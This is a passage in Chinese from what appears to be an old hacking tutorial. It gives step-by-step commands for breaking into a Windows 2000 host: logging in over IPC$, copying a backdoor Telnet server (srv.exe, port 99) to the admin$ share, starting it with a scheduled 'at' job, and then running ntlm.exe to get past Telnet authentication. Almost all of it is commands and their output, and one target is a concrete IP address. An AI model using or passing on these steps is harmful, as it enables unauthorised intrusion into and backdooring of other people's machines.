net use \\IP Address\IPC$ ["password"] /user:"guset",通过IPC的远程登陆就成功了。登陆成功之后先复制一个Telnet的程序上去(小榕流光安装目录下的Tools目录里的Srv.exe,另外,还有ntml.xex,一会要用),这个程序是在对方上面开一个Telnet服务,端口是99。copy c:\hack\srv.exe \\***.***.***.***\admin$然后利用定时服务启动它,先了解对方的时间:net time \\***.***.***.***显示:\\***.***.***.*** 的当前时间是 2001/1/8 下午 08:55 命令成功完成。 然后启动srv.exe:at \\***.***.***.*** 09:00 srv.exe 显示:新加了一项作业,其作业 ID = 0
过几分钟后,telnet ***.***.***.*** 99 这里不需要验证身份,直接登录,显示:c:\winnt:\system32> 我们就成功登陆上去了。然后又在本地打开命令提示符,另开一个窗口,输入:copy c:\hack\ntlm.exe \\211.21.193.202\admin$把事先存放在hack目录里的ntlm.exe拷过去。然后又回到刚才的telnet窗口,运行ntlm.exe,C:\WINNT\system32> ntlm显示: Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.